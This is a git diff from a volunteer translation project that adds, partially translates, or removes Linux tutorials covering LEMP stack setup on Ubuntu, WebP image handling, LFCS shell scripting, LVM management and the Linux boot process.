+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-HTTP-2.0-Protocol-Info.png)
+>Check HTTP 2.0 Protocol Info
+
+#### 13. In order to install extra PHP7.0 modules use the `apt search php7.0` command to find a PHP module and install it.
+
+Also, try to install the following PHP modules which can come in handy in case you are planning to [install WordPress][5] or other CMS.
+
+```
+$ sudo apt install php7.0-mcrypt php7.0-mbstring
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-PHP-7-Modules.png)
+>Install PHP 7 Modules
+
+#### 14. To register the PHP extra modules just restart PHP-FPM daemon by issuing the below command.
+
+```
+$ sudo systemctl restart php7.0-fpm.service
+```
+
+### Step 4: Install MariaDB Database
+
+#### 15. Finally, in order to complete our LEMP stack we need the MariaDB database component to store and manage website data.
+
+Install MariaDB database management system by running the below command and restart PHP-FPM service in order to use MySQL module to access the database.
+
+```
+$ sudo apt install mariadb-server mariadb-client php7.0-mysql
+$ sudo systemctl restart php7.0-fpm.service
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Install-MariaDB-for-Nginx.png)
+>Install MariaDB for Nginx
+
+#### 16. To secure the MariaDB installation, run the security script provided by the binary package from Ubuntu repositories which will ask you set a root password, remove anonymous users, disable root login remotely and remove test database.
+
+Run the script by issuing the below command and answer all questions with yes. Use the below screenshot as a guide.
+
+```
+$ sudo mysql_secure_installation
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Secure-MariaDB-Installation-for-Nginx.png)
+>Secure MariaDB Installation for Nginx
+
+#### 17. To configure MariaDB so that ordinary users can access the database without system sudo privileges, go to MySQL command line interface with root privileges and run the below commands on MySQL interpreter:
+
+```
+$ sudo mysql
+MariaDB> use mysql;
+MariaDB> update user set plugin=’‘ where User=’root’;
+MariaDB> flush privileges;
+MariaDB> exit
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/MariaDB-User-Permissions.png)
+>MariaDB User Permissions
+
+Finally, login to MariaDB database and run an arbitrary command without root privileges by executing the below command:
+
+```
+$ mysql -u root -p -e 'show databases'
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/05/Check-MariaDB-Databases.png)
+>Check MariaDB Databases
+
+That’ all! Now you have a **LEMP** stack configured on **Ubuntu 16.04** server that allows you to deploy complex dynamic web applications that can interact with databases.
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/install-nginx-mariadb-php7-http2-on-ubuntu-16-04/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+tecmint+%28Tecmint%3A+Linux+Howto%27s+Guide%29
+
+作者:[Matei Cezar ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://www.tecmint.com/author/cezarmatei/
+[1]: http://www.tecmint.com/installation-of-ubuntu-16-04-server-edition/
+[2]: http://www.tecmint.com/apt-advanced-package-command-examples-in-ubuntu/
+[3]: http://www.tecmint.com/20-netstat-commands-for-linux-network-management/
+[4]: http://www.tecmint.com/manage-services-using-systemd-and-systemctl-in-linux/
+[5]: http://www.tecmint.com/install-wordpress-using-lamp-or-lemp-on-rhel-centos-fedora/
diff --git a/sources/tech/20160531 HOW TO USE WEBP IMAGES IN UBUNTU LINUX.md b/sources/tech/20160531 HOW TO USE WEBP IMAGES IN UBUNTU LINUX.md
new file mode 100644
index 0000000000..45cc53157e
--- /dev/null
+++ b/sources/tech/20160531 HOW TO USE WEBP IMAGES IN UBUNTU LINUX.md
@@ -0,0 +1,180 @@
+HOW TO USE WEBP IMAGES IN UBUNTU LINUX
+=========================================
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/support-webp-ubuntu-linux.jpg)
+>Brief: This guide shows you how to view WebP images in Linux and how to convert WebP images to JPEG or PNG format.
+
+###WHAT IS WEBP?
+
+It’s been over five years since Google introduced [WebP file format][0] for images. WebP provides lossy and lossless compression and WebP compressed files are around 25% smaller in size when compared to JPEG compression, Google claims.
+
+Google aimed WebP to become the new standard for images on the web but I don’t see it happening. It’s over five years and it’s still not adopted as a standard except in Google’s ecosystem. But as we know, Google is pushy about its technologies. Few months back Google changed all the images on Google Plus to WebP.
+
+If you download those images from Google Plus using Google Chrome, you’ll have WebP images, no matter if you had uploaded PNG or JPEG. And that’s not the problem. The actual problem is when you try to open that files in Ubuntu using the default GNOME Image Viewer and you see this error:
+
+>**Could not find XYZ.webp**
+>**Unrecognized image file format**
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-1.png)
+>GNOME Image Viewer doesn’t support WebP images
+
+In this tutorial, we shall see
+
+- how to add WebP support in Linux
+- list of programs that support WebP images
+- how to convert WebP images to PNG or JPEG
+- how to download WebP images directly as PNG images
+
+### HOW TO VIEW WEBP IMAGES IN UBUNTU AND OTHER LINUX
+
+[GNOME Image Viewer][3], the default image viewer in many Linux distributions including Ubuntu, doesn’t support WebP images. There are no plugins available at present that could enable GNOME Image Viewer to add WebP support.
+
+This means that we simply cannot use GNOME Image Viewer to open WebP files in Linux. A better alternative is [gThumb][4] that supports WebP images by default.
+
+To install gThumb in Ubuntu and other Ubuntu based Linux distributions, use the command below:
+
+```
+sudo apt-get install gthumb
+```
+
+Once installed, you can simply rightly click on the WebP image and select gThumb to open it. You should be able to see it now:
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-2.jpeg)
+>WebP image in gThumb
+
+### MAKE GTHUMB THE DEFAULT APPLICATION FOR WEBP IMAGES IN UBUNTU
+
+For Ubuntu beginners, if you like to make gThumb the default application for opening WebP files, just follow the steps below:
+
+#### Step 1: Right click on the WebP image and select Properties.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-3.png)
+>Select Properties from Right Click menu
+
+#### Step 2: Go to Open With tab, select gThumb and click on Set as default.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-4.png)
+>Make gThumb the default application for WebP images in Ubuntu
+
+### MAKE GTHUMB THE DEFAULT APPLICATIONS FOR ALL IMAGES
+
+gThumb has a lot more to offer than Image Viewer. For example, you can do simple editing, add color filters to the images etc. Adding the filter is not as effective as XnRetro, the dedicated tool for [adding Instagram like effects on Linux][5], but the basic filters are available.
+
+I liked gThumb a lot and decided to make it the default image viewer. If you also want to make gThumb the default application for all kind of images in Ubuntu, follow the steps below:
+
+####Step 1: Open System Settings
+
+![](http://itsfoss.com/wp-content/uploads/2014/04/System_Settings_ubuntu_1404.jpeg)
+
+#### Step 2: Go to Details.
+
+![](http://itsfoss.com/wp-content/uploads/2013/11/System_settings_Ubuntu_1.jpeg)
+
+#### Step 3: Select gThumb as the default applications for images here.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-5.png)
+
+### ALTERNATIVE PROGRAMS TO OPEN WEBP FILES IN LINUX
+
+It is possible that you might not like gThumb. If that’s the case, you can choose one of the following applications to view WebP images in Linux:
+
+- [XnView][6] (Not open source)
+- GIMP with unofficial WebP plugin that can be installed via this [PPA][7] that is available until Ubuntu 15.10. I’ll cover this part in another article.
+- [Gwenview][8]
+
+### CONVERT WEBP IMAGES TO PNG AND JPEG IN LINUX
+
+There are two ways to convert WebP images in Linux:
+
+- Command line
+- GUI
+
+#### 1. USING COMMAND LINE TO CONVERT WEBP IMAGES IN LINUX
+
+You need to install WebP tools first. Open a terminal and use the following command:
+
+```
+sudo apt-get install webp
+```
+
+##### CONVERT JPEG/PNG TO WEBP
+
+We’ll use cwebp command (does it mean compress to WebP?) to convert JPEG or PNG files to WebP. The command format is like:
+
+```
+cwebp -q [image_quality] [JPEG/PNG_filename] -o [WebP_filename]
+```
+
+For example, you can use the following command:
+
+```
+cwebp -q 90 example.jpeg -o example.webp
+```
+
+##### CONVERT WEBP TO JPEG/PNG
+
+To convert WebP images to JPEG or PNG, we’ll use dwebp command. The command format is:
+
+```
+dwebp [WebP_filename] -o [PNG_filename]
+```
+
+An example of this command could be:
+
+```
+dwebp example.webp -o example.png
+```
+
+#### 2. USING GUI TOOL TO CONVERT WEBP TO JPEG/PNG
+
+For this purpose, we will use XnConvert which is a free but not open source application. You can download the installer files from their website:
+
+[Download XnConvert][1]
+
+Note that XnConvert is a powerful tool that you can use for batch resizing images. However, in this tutorial, we shall only see how to convert a single WebP image to PNG/JPEG.
+
+Open XnConvert and select the input file:
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-6.jpeg)
+
+In the Output tab, select the output format you want it to be converted. Once you have selected the output format, click on Convert.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-7.jpeg)
+
+That’s all you need to do to convert WebP images to PNG, JPEg or any other image format of your choice.
+
+### DOWNLOAD WEBP IMAGES AS PNG DIRECTLY IN CHROME WEB BROWSER
+
+Probably you don’t like WebP image format at all and you don’t want to install a new software just to view WebP images in Linux. It will be a bigger pain if you have to convert the WebP file for future use.
+
+An easier and less painful way to deal with is to install a Chrome extension Save Image as PNG. With this extension, you can simply right click on a WebP image and save it as PNG directly.
+
+![](http://itsfoss.com/wp-content/uploads/2016/05/WebP-images-Ubuntu-Linux-8.png)
+>Saving WebP image as PNG in Google Chrome
+
+[Get Save Image as PNG extension][2]
+
+### WHAT’S YOUR PICK?
+
+I hope this detailed tutorial helped you to get WebP support on Linux and helped you to convert WebP images. How do you handle WebP images in Linux? Which tool do you use? From the above described methods, which one did you like the most?
+
+
+----------------------
+via: http://itsfoss.com/webp-ubuntu-linux/?utm_source=feedburner&utm_medium=feed&utm_campaign=Feed%3A+ItsFoss+%28Its+FOSS%21+An+Open+Source+Blog%29
+
+作者:[Abhishek Prakash][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://itsfoss.com/author/abhishek/
+[0]: https://developers.google.com/speed/webp/
+[1]: http://www.xnview.com/en/xnconvert/#downloads
+[2]: https://chrome.google.com/webstore/detail/save-image-as-png/nkokmeaibnajheohncaamjggkanfbphi?utm_source=chrome-ntp-icon
+[3]: https://wiki.gnome.org/Apps/EyeOfGnome
+[4]: https://wiki.gnome.org/Apps/gthumb
+[5]: http://itsfoss.com/add-instagram-effects-xnretro-ubuntu-linux/
+[6]: http://www.xnview.com/en/xnviewmp/#downloads
+[7]: https://launchpad.net/~george-edison55/+archive/ubuntu/webp
+[8]: https://userbase.kde.org/Gwenview
diff --git a/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md b/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md
index 841d5c0625..199d65957e 100644
--- a/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md
+++ b/sources/tech/LFCS/Part 10 - LFCS--Understanding and Learning Basic Shell Scripting and Linux Filesystem Troubleshooting.md
@@ -1,51 +1,54 @@
-Being translated by hittlle......
-Part 10 - LFCS: Understanding & Learning Basic Shell Scripting and Linux Filesystem Troubleshooting
+LFCS 第十讲:学习简单的 Shell 脚本编程和文件系统故障排除
+
================================================================================
-The Linux Foundation launched the LFCS certification (Linux Foundation Certified Sysadmin), a brand new initiative whose purpose is to allow individuals everywhere (and anywhere) to get certified in basic to intermediate operational support for Linux systems, which includes supporting running systems and services, along with overall monitoring and analysis, plus smart decision-making when it comes to raising issues to upper support teams.
+Linux 基金会发起了 LFCS 认证 (Linux Foundation Certified Sysadmin, Linux 基金会认证系统管理员),这是一个全新的认证体系,主要目标是让全世界任何人都有机会考取认证。认证内容为 Linux 中间系统的管理,主要包括:系统运行和服务的维护、全面监控和分析的能力以及问题来临时何时想上游团队请求帮助的决策能力
![Basic Shell Scripting and Filesystem Troubleshooting](http://www.tecmint.com/wp-content/uploads/2014/11/lfcs-Part-10.png)
-Linux Foundation Certified Sysadmin – Part 10
+LFCS 系列第十讲
-Check out the following video that guides you an introduction to the Linux Foundation Certification Program.
+请看以下视频,这里边介绍了 Linux 基金会认证程序。
注:youtube 视频
-
+
-This is the last article (Part 10) of the present 10-tutorial long series. In this article we will focus on basic shell scripting and troubleshooting Linux file systems. Both topics are required for the LFCS certification exam.
+本讲是系列教程中的第十讲,主要集中讲解简单的 Shell 脚本编程和文件系统故障排除。这两块内容都是 LFCS 认证中的必备考点。
-### Understanding Terminals and Shells ###
+### 理解终端 (Terminals) 和 Shell ###
-Let’s clarify a few concepts first.
+首先要声明一些概念。
-- A shell is a program that takes commands and gives them to the operating system to be executed.
-- A terminal is a program that allows us as end users to interact with the shell. One example of a terminal is GNOME terminal, as shown in the below image.
+- Shell 是一个程序,它将命令传递给操作系统来执行。
+- Terminal 也是一个程序,作为最终用户,我们需要使用它与 Shell 来交互。比如,下边的图片是 GNOME Terminal。
![Gnome Terminal](http://www.tecmint.com/wp-content/uploads/2014/11/Gnome-Terminal.png)
Gnome Terminal
-When we first start a shell, it presents a command prompt (also known as the command line), which tells us that the shell is ready to start accepting commands from its standard input device, which is usually the keyboard.
+启动 Shell 之后,会呈现一个命令提示符 (也称为命令行) 提示我们 Shell 已经做好了准备,接受标准输入设备输入的命令,这个标准输入设备通常是键盘。
-You may want to refer to another article in this series ([Use Command to Create, Edit, and Manipulate files – Part 1][1]) to review some useful commands.
+你可以参考该系列文章的 [第一讲 使用命令创建、编辑和操作文件][1] 来温习一些常用的命令。
-Linux provides a range of options for shells, the following being the most common:
+Linux 为提供了许多可以选用的 Shell,下面列出一些常用的:
**bash Shell**
-Bash stands for Bourne Again SHell and is the GNU Project’s default shell. It incorporates useful features from the Korn shell (ksh) and C shell (csh), offering several improvements at the same time. This is the default shell used by the distributions covered in the LFCS certification, and it is the shell that we will use in this tutorial.
+Bash 代表 Bourne Again Shell,它是 GNU 项目默认的 Shell。它借鉴了 Korn shell (ksh) 和 C shell (csh) 中有用的特性,并同时对性能进行了提升。它同时也是 LFCS 认证中所涵盖的风发行版中默认 Shell,也是本系列教程将使用的 Shell。
**sh Shell**
-The Bourne SHell is the oldest shell and therefore has been the default shell of many UNIX-like operating systems for many years.
-ksh Shell
+Bash Shell 是一个比较古老的 shell,一次多年来都是多数类 Unix 系统的默认 shell。
-The Korn SHell is a Unix shell which was developed by David Korn at Bell Labs in the early 1980s. It is backward-compatible with the Bourne shell and includes many features of the C shell.
+**ksh Shell**
-A shell script is nothing more and nothing less than a text file turned into an executable program that combines commands that are executed by the shell one after another.
+Korn SHell (ksh shell) 也是一个 Unix shell,是贝尔实验室 (Bell Labs) 的 David Korn 在 19 世纪 80 年代初的时候开发的。它兼容 Bourne shell ,并同时包含了 C shell 中的多数特性。
-### Basic Shell Scripting ###
+
+一个 shell 脚本仅仅只是一个可执行的文本文件,里边包含一条条可执行命令。
+
+### 简单的 Shell 脚本编程 ###
As mentioned earlier, a shell script is born as a plain text file. Thus, can be created and edited using our preferred text editor. You may want to consider using vi/m (refer to [Usage of vi Editor – Part 2][2] of this series), which features syntax highlighting for your convenience.
@@ -291,7 +294,7 @@ If we’re only interested in finding out what’s wrong (without trying to fix
Depending on the error messages in the output of fsck, we will know whether we can try to solve the issue ourselves or escalate it to engineering teams to perform further checks on the hardware.
-### Summary ###
+### 总结 ###
We have arrived at the end of this 10-article series where have tried to cover the basic domain competencies required to pass the LFCS exam.
@@ -304,7 +307,7 @@ If you have any questions or comments, they are always welcome – so don’t he
via: http://www.tecmint.com/linux-basic-shell-scripting-and-linux-filesystem-troubleshooting/
作者:[Gabriel Cánepa][a]
-译者:[译者ID](https://github.com/译者ID)
+译者:[GHLandy](https://github.com/GHLandy)
校对:[校对者ID](https://github.com/校对者ID)
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
diff --git a/sources/tech/LFCS/Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands.md b/sources/tech/LFCS/Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands.md
new file mode 100644
index 0000000000..4d2a9d7a13
--- /dev/null
+++ b/sources/tech/LFCS/Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands.md
@@ -0,0 +1,206 @@
+Part 11 - How to Manage and Create LVM Using vgcreate, lvcreate and lvextend Commands
+============================================================================================
+
+Because of the changes in the LFCS exam requirements effective Feb. 2, 2016, we are adding the necessary topics to the [LFCS series][1] published here. To prepare for this exam, your are highly encouraged to use the [LFCE series][2] as well.
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/Manage-LVM-and-Create-LVM-Partition-in-Linux.png)
+>LFCS: Manage LVM and Create LVM Partition – Part 11
+
+One of the most important decisions while installing a Linux system is the amount of storage space to be allocated for system files, home directories, and others. If you make a mistake at that point, growing a partition that has run out of space can be burdensome and somewhat risky.
+
+**Logical Volumes Management** (also known as **LVM**), which have become a default for the installation of most (if not all) Linux distributions, have numerous advantages over traditional partitioning management. Perhaps the most distinguishing feature of LVM is that it allows logical divisions to be resized (reduced or increased) at will without much hassle.
+
+The structure of the LVM consists of:
+
+* One or more entire hard disks or partitions are configured as physical volumes (PVs).
+* A volume group (**VG**) is created using one or more physical volumes. You can think of a volume group as a single storage unit.
+* Multiple logical volumes can then be created in a volume group. Each logical volume is somewhat equivalent to a traditional partition – with the advantage that it can be resized at will as we mentioned earlier.
+
+In this article we will use three disks of **8 GB** each (**/dev/sdb**, **/dev/sdc**, and **/dev/sdd**) to create three physical volumes. You can either create the PVs directly on top of the device, or partition it first.
+
+Although we have chosen to go with the first method, if you decide to go with the second (as explained in [Part 4 – Create Partitions and File Systems in Linux][3] of this series) make sure to configure each partition as type `8e`.
+
+### Creating Physical Volumes, Volume Groups, and Logical Volumes
+
+To create physical volumes on top of **/dev/sdb**, **/dev/sdc**, and **/dev/sdd**, do:
+
+```
+# pvcreate /dev/sdb /dev/sdc /dev/sdd
+```
+
+You can list the newly created PVs with:
+
+```
+# pvs
+```
+
+and get detailed information about each PV with:
+
+```
+# pvdisplay /dev/sdX
+```
+
+(where **X** is b, c, or d)
+
+If you omit `/dev/sdX` as parameter, you will get information about all the PVs.
+
+To create a volume group named `vg00` using `/dev/sdb` and `/dev/sdc` (we will save `/dev/sdd` for later to illustrate the possibility of adding other devices to expand storage capacity when needed):
+
+```
+# vgcreate vg00 /dev/sdb /dev/sdc
+```
+
+As it was the case with physical volumes, you can also view information about this volume group by issuing:
+
+```
+# vgdisplay vg00
+```
+
+Since `vg00` is formed with two **8 GB** disks, it will appear as a single **16 GB** drive:
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/List-LVM-Volume-Groups.png)
+>List LVM Volume Groups
+
+When it comes to creating logical volumes, the distribution of space must take into consideration both current and future needs. It is considered good practice to name each logical volume according to its intended use.
+
+For example, let’s create two LVs named `vol_projects` (**10 GB**) and `vol_backups` (remaining space), which we can use later to store project documentation and system backups, respectively.
+
+The `-n` option is used to indicate a name for the LV, whereas `-L` sets a fixed size and `-l` (lowercase L) is used to indicate a percentage of the remaining space in the container VG.
+
+```
+# lvcreate -n vol_projects -L 10G vg00
+# lvcreate -n vol_backups -l 100%FREE vg00
+```
+
+As before, you can view the list of LVs and basic information with:
+
+```
+# lvs
+```
+
+and detailed information with
+
+```
+# lvdisplay
+```
+
+To view information about a single **LV**, use **lvdisplay** with the **VG** and **LV** as parameters, as follows:
+
+```
+# lvdisplay vg00/vol_projects
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/List-Logical-Volume.png)
+>List Logical Volume
+
+In the image above we can see that the LVs were created as storage devices (refer to the LV Path line). Before each logical volume can be used, we need to create a filesystem on top of it.
+
+We’ll use ext4 as an example here since it allows us both to increase and reduce the size of each LV (as opposed to xfs that only allows to increase the size):
+
+```
+# mkfs.ext4 /dev/vg00/vol_projects
+# mkfs.ext4 /dev/vg00/vol_backups
+```
+
+In the next section we will explain how to resize logical volumes and add extra physical storage space when the need arises to do so.
+
+### Resizing Logical Volumes and Extending Volume Groups
+
+Now picture the following scenario. You are starting to run out of space in `vol_backups`, while you have plenty of space available in `vol_projects`. Due to the nature of LVM, we can easily reduce the size of the latter (say **2.5 GB**) and allocate it for the former, while resizing each filesystem at the same time.
+
+Fortunately, this is as easy as doing:
+
+```
+# lvreduce -L -2.5G -r /dev/vg00/vol_projects
+# lvextend -l +100%FREE -r /dev/vg00/vol_backups
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/Resize-Reduce-Logical-Volume-and-Volume-Group.png)
+>Resize Reduce Logical Volume and Volume Group
+
+It is important to include the minus `(-)` or plus `(+)` signs while resizing a logical volume. Otherwise, you’re setting a fixed size for the LV instead of resizing it.
+
+It can happen that you arrive at a point when resizing logical volumes cannot solve your storage needs anymore and you need to buy an extra storage device. Keeping it simple, you will need another disk. We are going to simulate this situation by adding the remaining PV from our initial setup (`/dev/sdd`).
+
+To add `/dev/sdd` to `vg00`, do
+
+```
+# vgextend vg00 /dev/sdd
+```
+
+If you run vgdisplay `vg00` before and after the previous command, you will see the increase in the size of the VG:
+
+```
+# vgdisplay vg00
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/List-Volume-Group-Size.png)
+>Check Volume Group Disk Size
+
+Now you can use the newly added space to resize the existing LVs according to your needs, or to create additional ones as needed.
+
+### Mounting Logical Volumes on Boot and on Demand
+
+Of course there would be no point in creating logical volumes if we are not going to actually use them! To better identify a logical volume we will need to find out what its `UUID` (a non-changing attribute that uniquely identifies a formatted storage device) is.
+
+To do that, use blkid followed by the path to each device:
+
+```
+# blkid /dev/vg00/vol_projects
+# blkid /dev/vg00/vol_backups
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/Find-Logical-Volume-UUID.png)
+>Find Logical Volume UUID
+
+Create mount points for each LV:
+
+```
+# mkdir /home/projects
+# mkdir /home/backups
+```
+
+and insert the corresponding entries in `/etc/fstab` (make sure to use the UUIDs obtained before):
+
+```
+UUID=b85df913-580f-461c-844f-546d8cde4646 /home/projects ext4 defaults 0 0
+UUID=e1929239-5087-44b1-9396-53e09db6eb9e /home/backups ext4 defaults 0 0
+```
+
+Then save the changes and mount the LVs:
+
+```
+# mount -a
+# mount | grep home
+```
+
+![](http://www.tecmint.com/wp-content/uploads/2016/03/Find-Logical-Volume-UUID.png)
+>Find Logical Volume UUID
+
+When it comes to actually using the LVs, you will need to assign proper `ugo+rwx` permissions as explained in [Part 8 – Manage Users and Groups in Linux][4] of this series.
+
+### Summary
+
+In this article we have introduced [Logical Volume Management][5], a versatile tool to manage storage devices that provides scalability. When combined with RAID (which we explained in [Part 6 – Create and Manage RAID in Linux][6] of this series), you can enjoy not only scalability (provided by LVM) but also redundancy (offered by RAID).
+
+In this type of setup, you will typically find `LVM` on top of `RAID`, that is, configure RAID first and then configure LVM on top of it.
+
+If you have questions about this article, or suggestions to improve it, feel free to reach us using the comment form below.
+
+--------------------------------------------------------------------------------
+
+via: http://www.tecmint.com/linux-basic-shell-scripting-and-linux-filesystem-troubleshooting/
+
+作者:[Gabriel Cánepa][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创翻译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]: http://www.tecmint.com/author/gacanepa/
+[1]: http://www.tecmint.com/sed-command-to-create-edit-and-manipulate-files-in-linux/
+[2]: http://www.tecmint.com/installing-network-services-and-configuring-services-at-system-boot/
+[3]: http://www.tecmint.com/create-partitions-and-filesystems-in-linux/
+[4]: http://www.tecmint.com/manage-users-and-groups-in-linux/
+[5]: http://www.tecmint.com/create-lvm-storage-in-linux/
+[6]: http://www.tecmint.com/creating-and-managing-raid-backups-in-linux/
diff --git a/sources/tech/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md b/sources/tech/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
deleted file mode 100644
index 3a2dfa844a..0000000000
--- a/sources/tech/LFCS/Part 7 - LFCS--Managing System Startup Process and Services SysVinit Systemd and Upstart.md
+++ /dev/null
@@ -1,369 +0,0 @@
-Translating by Flowsnow
-
-Part 7 - LFCS: Managing System Startup Process and Services (SysVinit, Systemd and Upstart)
-================================================================================
-A couple of months ago, the Linux Foundation announced the LFCS (Linux Foundation Certified Sysadmin) certification, an exciting new program whose aim is allowing individuals from all ends of the world to get certified in performing basic to intermediate system administration tasks on Linux systems. This includes supporting already running systems and services, along with first-hand problem-finding and analysis, plus the ability to decide when to raise issues to engineering teams.
-
-![Linux Foundation Certified Sysadmin – Part 7](http://www.tecmint.com/wp-content/uploads/2014/10/lfcs-Part-7.png)
-
-Linux Foundation Certified Sysadmin – Part 7
-
-The following video describes an brief introduction to The Linux Foundation Certification Program.
-
-注:youtube 视频
-
-
-This post is Part 7 of a 10-tutorial series, here in this part, we will explain how to Manage Linux System Startup Process and Services, that are required for the LFCS certification exam.
-
-### Managing the Linux Startup Process ###
-
-The boot process of a Linux system consists of several phases, each represented by a different component. The following diagram briefly summarizes the boot process and shows all the main components involved.
-
-![Linux Boot Process](http://www.tecmint.com/wp-content/uploads/2014/10/Linux-Boot-Process.png)
-
-Linux Boot Process
-
-When you press the Power button on your machine, the firmware that is stored in a EEPROM chip in the motherboard initializes the POST (Power-On Self Test) to check on the state of the system’s hardware resources. When the POST is finished, the firmware then searches and loads the 1st stage boot loader, located in the MBR or in the EFI partition of the first available disk, and gives control to it.
-
-#### MBR Method ####
-
-The MBR is located in the first sector of the disk marked as bootable in the BIOS settings and is 512 bytes in size.
-
-- First 446 bytes: The bootloader contains both executable code and error message text.
-- Next 64 bytes: The Partition table contains a record for each of four partitions (primary or extended). Among other things, each record indicates the status (active / not active), size, and start / end sectors of each partition.
-- Last 2 bytes: The magic number serves as a validation check of the MBR.
-
-The following command performs a backup of the MBR (in this example, /dev/sda is the first hard disk). The resulting file, mbr.bkp can come in handy should the partition table become corrupt, for example, rendering the system unbootable.
-
-Of course, in order to use it later if the need arises, we will need to save it and store it somewhere else (like a USB drive, for example). That file will help us restore the MBR and will get us going once again if and only if we do not change the hard drive layout in the meanwhile.
-
-**Backup MBR**
-
- # dd if=/dev/sda of=mbr.bkp bs=512 count=1
-
-![Backup MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Backup-MBR-in-Linux.png)
-
-Backup MBR in Linux
-
-**Restoring MBR**
-
- # dd if=mbr.bkp of=/dev/sda bs=512 count=1
-
-![Restore MBR in Linux](http://www.tecmint.com/wp-content/uploads/2014/10/Restore-MBR-in-Linux.png)
-
-Restore MBR in Linux
-
-#### EFI/UEFI Method ####
-
-For systems using the EFI/UEFI method, the UEFI firmware reads its settings to determine which UEFI application is to be launched and from where (i.e., in which disk and partition the EFI partition is located).
-
-Next, the 2nd stage boot loader (aka boot manager) is loaded and run. GRUB [GRand Unified Boot] is the most frequently used boot manager in Linux. One of two distinct versions can be found on most systems used today.
-
-- GRUB legacy configuration file: /boot/grub/menu.lst (older distributions, not supported by EFI/UEFI firmwares).
-- GRUB2 configuration file: most likely, /etc/default/grub.
-
-Although the objectives of the LFCS exam do not explicitly request knowledge about GRUB internals, if you’re brave and can afford to mess up your system (you may want to try it first on a virtual machine, just in case), you need to run.
-
- # update-grub
-
-As root after modifying GRUB’s configuration in order to apply the changes.
-
-Basically, GRUB loads the default kernel and the initrd or initramfs image. In few words, initrd or initramfs help to perform the hardware detection, the kernel module loading and the device discovery necessary to get the real root filesystem mounted.
-
-Once the real root filesystem is up, the kernel executes the system and service manager (init or systemd, whose process identification or PID is always 1) to begin the normal user-space boot process in order to present a user interface.
-
-Both init and systemd are daemons (background processes) that manage other daemons, as the first service to start (during boot) and the last service to terminate (during shutdown).
-
-![Systemd and Init](http://www.tecmint.com/wp-content/uploads/2014/10/systemd-and-init.png)
-
-Systemd and Init
-
-### Starting Services (SysVinit) ###
-
-The concept of runlevels in Linux specifies different ways to use a system by controlling which services are running. In other words, a runlevel controls what tasks can be accomplished in the current execution state = runlevel (and which ones cannot).
-
-Traditionally, this startup process was performed based on conventions that originated with System V UNIX, with the system passing executing collections of scripts that start and stop services as the machine entered a specific runlevel (which, in other words, is a different mode of running the system).
-
-Within each runlevel, individual services can be set to run, or to be shut down if running. Latest versions of some major distributions are moving away from the System V standard in favour of a rather new service and system manager called systemd (which stands for system daemon), but usually support sysv commands for compatibility purposes. This means that you can run most of the well-known sysv init tools in a systemd-based distribution.
-
-- Read Also: [Why ‘systemd’ replaces ‘init’ in Linux][1]
-
-Besides starting the system process, init looks to the /etc/inittab file to decide what runlevel must be entered.
-
-注:表格
-
-
-
-
-
-
-
-
Runlevel
-
Description
-
-
-
0
-
Halt the system. Runlevel 0 is a special transitional state used to shutdown the system quickly.
-
-
-
1
-
Also aliased to s, or S, this runlevel is sometimes called maintenance mode. What services, if any, are started at this runlevel varies by distribution. It’s typically used for low-level system maintenance that may be impaired by normal system operation.
-
-
-
2
-
Multiuser. On Debian systems and derivatives, this is the default runlevel, and includes -if available- a graphical login. On Red-Hat based systems, this is multiuser mode without networking.
-
-
-
3
-
On Red-Hat based systems, this is the default multiuser mode, which runs everything except the graphical environment. This runlevel and levels 4 and 5 usually are not used on Debian-based systems.
-
-
-
4
-
Typically unused by default and therefore available for customization.
-
-
-
5
-
